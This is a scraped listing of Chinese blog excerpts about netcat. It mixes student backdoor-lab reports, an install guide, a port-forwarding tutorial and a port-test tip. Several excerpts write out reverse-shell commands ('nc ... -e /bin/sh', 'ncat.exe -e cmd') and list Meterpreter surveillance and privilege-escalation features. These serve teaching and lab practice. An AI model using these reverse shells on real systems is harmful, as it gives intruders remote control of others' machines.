netcat

2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

强颜欢笑 提交于 2020-05-06 03:08:48
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat,然后各使用netcat互相攻击一次。最后使用在linux用cron设置一个定时启动。 (2)使用socat获取主机Shell, 任务计划启动 与第一个区别在于,第二个虚拟机使用Windows的任务计划启动一次,设置一个定时启动。 (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 可执行文件就是后门程序。利用ncat或socat传送如果不行,复制粘贴也可以。 (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 这个就是获取shell以后的阶段,很有意思了。 (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell加分内容一并写入本实验报告。 这个不是很懂。。。也暂时没有做,过段时间看看别人的,问题不大。 2.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 一个是通过U盘硬盘这种可移动设备,如果写一个AutoRun.inf,插上以后就会自动运行后门。 二是盗版软件,破解工具。实际上这可能是无法避免的

2018-2019-2 网络对抗技术 20165230 Exp2 后门原理与实践

谁说我不能喝 提交于 2020-05-06 03:08:33
[toc] <font size=3> 1.实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 2.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在下载的软件中 邮箱附件、网站链接 注入在可执行文件里 注入在office文件的宏里面 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改名字伪装成其他程序,一点击即启动 Linux可以通过cron启动 Windows下通过任务计划、开机自启动、修改注册表项来启动后门程序 3.Meterpreter有哪些给你映像深刻的功能? 获取摄像头权限进行拍照、录像 获取麦克风权限进行录音 获取键盘输入 提升用户权限 4.如何发现自己有系统有没有被安装后门? 安装杀毒软件并进行扫描 观察进程以及端口,看看有没有异常开放的端口 查看开机自启动向、注册表项中有无异常 3.常用后门工具实践 3.1netcat Windows获得Linux

centos安装netcat工具及测试

送分小仙女□ 提交于 2020-05-06 02:00:25
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 1、下载安装 wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download tar -zxvf netcat-0.7.1.tar.gz -C /usr/local cd /usr/local mv netcat-0.7.1 netcat cd /usr/local/netcat ./configure make && make install 2、配置 vim /etc/profile 添加以下内容: # set netcat path export NETCAT_HOME=/usr/local/netcat export PATH=$PATH:$NETCAT_HOME/bin    保存,退出,并使配置生效: source /etc/profile 3、测试 nc -help成功 在服务器

20155216 Exp2 后门原理与实践

冷暖自知 提交于 2020-05-06 01:45:41
后门原理与实践 实验内容: 常用后门工具 NC 或 netcat netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。 Win获得Linux Shell 1、windows 打开监听 先解压ncat.rar,使用Dos命令行,进入ncat文件夹运行可执行文件ncat.exe。使用 ncat.exe -l -p 5216 使5216端口处于监听状态。 2、Linux反弹连接win 使用ipconfig查询主机IP地址。 使用 nc 192.168.1.104 5216 -e /bin/sh 。 3、windows下获得一个linux shell 可运行任何指令,如ls: Linux获得Win Shell 1、Linux运行监听指令 Linux下输入命令 nc -l -p 5216 。 2、.Windows反弹连接Linux 使用 ifconfig 查看Linux的IP地址。 使用Dos命令行输入 ncat.exe -e cmd.192.168.253.128 5216 。 3.Linux下看到Windows的命令提示 Netcat扩展知识 nc传输数据 1、Windows下监听5216端口: ncat.exe -l -p 5216 。

Linux 网络工具netcat(nc)的应用

假如想象 提交于 2020-05-06 00:35:01
NETCAT netcat是Linux常用的网络工具之一,它能通过TCP和UDP在网络中读写数据,通过与其他工具结合和重定向,可以在脚本中以多种方式使用它。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,我们可以建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 准备工作: 1)首先我们先打开两台Linux虚拟机(位于同一局域网,vmware虚拟机网络均选择桥接模式即可) 当然netcat在windows中也有应用 现在我们只考虑Linux情况 2)关闭防火墙并使用root权限   以centos7为例 输入 systemctl stop firewalld.service 命令关闭防火墙 输入su命令得到root权限 3)输入命令 ifconfig 查看 ip 地址 我们对于nc命令来做一个简单介绍,我们在两台机子上使用nc,所以会有一个服务端与客户端的建立,其实就是一台机子打开一个侦听端口,另一个去连接那个端口 我们可以在shell中输入 nc -h 可以查看它的参数都有什么用 命令有很多就不再赘述 下面讲最常见的几个   1)打开服务端口我们通常使用例如 nc -lp 333 333端口只是示例也可以选择其他端口   2)服务端连接端口使用 例如 nc -nv 192.168.0.115 333 其中192.168.0

NETCAT(NC)工具使用

我是研究僧i 提交于 2020-05-05 17:54:18
NC是什么? NC是NETCAT的简写,有着网络界的瑞士军刀美誉。因为他短小精悍,功能实用,被设计为一个简单,可靠的网络工具。 NC的作用 (1)传输文本信息 (2)传输文件/目录 (3)加密传输文件 (4)远程控制/木马 (5)加密传输文件 (6)流媒体服务器 (7)端口扫描 (8)远程克隆硬盘 NC常用的参数 -h 帮助信息 -l 监听模式 -n 指定数字的IP地址,不会进行DNS解析 -p 指定监听的本地端口 -u UDP模式 -v 显示详细的信息 -i secs延迟时间 -w secs 超时时间 -z 表示扫描时不发送任何数据包 -q 限制会话的次数 (到达次数后自动关闭会话,用于证明数据传输完成) 前期准备 准备两台机器,用于测试nc命令方法 主机A :10.1.1.1 主机B:10.1.1.2 NC传输文本信息 利用NC可以实现聊天,原理也十分简单,首先A先侦听一个端口(4444),等待B连接.。 然后主机指定主机A的IP地址以及侦听的端口(4444)。 A: nv -lp 4444 B:nc -nv 10.1.1.1 4444 NC传输文件 传输文件演示(侦听的端口接受数据) 使用NC传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了 把A机器上的一个txt文件发送到B机器上 需要注意操作次序,receiver (A)先侦听端口,sender (B

你离黑客的距离,就差这20个神器了

不问归期 提交于 2020-05-04 10:43:42
郑重声明:本文仅限技术交流,不得用于从事非法活动 在不少电影电视剧中,主角的身边都有这么一位电脑高手:他们分分钟可以黑进反派的网络,攻破安全防线,破解口令密码,拿到重要文件。他们的电脑屏幕上都是一些看不懂的图形和数字,你能看懂的就只有那个进度条,伴随着紧张的BGM,慢慢的向100%靠近······ 上面的场景和套路是不是很眼熟? 影视作品中的黑客当然有夸张和戏剧化的表现,不过,现实世界中的黑客也有一套他们的工具库,轩辕君梳理了常用的20个工具。有了他们,你也能化身电脑高手,成为那个瞩目的焦点。 以下分系统终端侧和网络侧两个方向,分别介绍10款常用的黑客工具。 - OllyDbg - WinDbg - IDA - APIMonitor - PCHunter - ProcExp - ProcMon - dex2jar - jd-gui - Mimikatz - WireShark - Fiddler - nmap - netcat - Nessus - SQLMap - hydra - shodan - zoomeye - metasploit 系统终端 系统终端侧的工具主要用于程序逆向分析、破解等用途。 OllyDbg 调试工具,简称OD,其名头在圈子里也算得上是顶流了。其黑客风的交互界面,丰富便捷的调试功能成为软件破解爱好者的首选利器。 WinDbg 也是一款调试工具,微软出品

萌新教程丨VulnHubDC系列之DC1靶机渗透测试

痞子三分冷 提交于 2020-04-23 14:30:34
Vulnhub是一个提供各种漏洞的靶机网站,特别适合萌新进行渗透测试演练。接下来笔者将通过图文结合的方式对于Vulnhub的DC系列九个靶机做出详解,不仅要完成靶机作者所布置的任务,还会发散思路用不同的方法寻求突破! 注:今天的文章是 i 春秋论坛作者小鲜略略略表哥发布的文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。 靶机配置及说明 靶机下载地址: https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.1.13 攻击机:Kali(VMware ) IP:192.168.1.10 特别说明:每个靶机作者都对靶机做了详细的描述以及攻击目标,比如DC1就需要找到5个flag,最终目标是在root的主目录中找到并读取该标志! 通过每个flag所获得知识点 1、msf的熟练使用以及搜索可利用漏洞(Drupal); 2、留意目标网站的配置文件(慢慢查看别错过重要信息); 3、数据库管理员提权(更新管理员密码或者添加一个新用户); 4、suid提权的命令(nmap、vim、find、bash、more、less、nano、cp)。 进入正文 开始之前让我们先来看看靶机与攻击机的配置,两者均是桥接模式(建议靶机和kali都保存快照,以便不时之需)。 靶机配置 靶机正常运行 kali配置

内网安全:03.对内网主机的端口进行探测

时光总嘲笑我的痴心妄想 提交于 2020-04-18 15:30:32
目录: lcx端口反向转发、搭建ngrok内网穿透转发端口、proxychains扫描内网主机 叙述: 有时候我们常常会在** 的时候,碰到一个内网环境。有一些端口是只有内部才能够访问到的,那么,我们为了访问到这个端口,就需要对端口进行转发。。。 当然,这有一个前提:内网的主机能够与外网相连接-------& bugfor首发:槿华*& 当然,如果碰到内网主机无法访问外网的情况,咱们就使用“proxychains扫描内网主机”,稍后也会描述这个方法 0x0 环境 内网:180.101.148.103 内网主机A(web服务器):172.19.0.3 他把80端口通过路由映射到外网 内网主机B(linux):172.19.0.2 他把端口22通过路由映射到外网 内网主机C(linux):172.19.0.1 ***机服务器:49.233.160.31 0x1 netcat、lcx端口反向转发 需要用到的东西:netcat工具、lcx工具、一台远程服务器 前提:内网的主机能够与外网相连接 **·linux主机映射shell窗口到* 机服务器(使用netcat) 远程服务器开启一个nc: nc.exe -n -vv -l -p 8888 #开启nc监听8888端口 内网主机反弹shell到 远程服务器的8888端口: nc -l -p 8888 -t -e /bin/sh **

macos环境测试远程端口是否通

≯℡__Kan透↙ 提交于 2020-04-12 11:20:36
ping端口:nc -vz -w 2 www.baidu.com 8080 NAME nc -- arbitrary TCP and UDP connections and listens DESCRIPTION The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet(1) does with some. -v details -z Specifies that nc should just scan for listening daemons, without sending any data to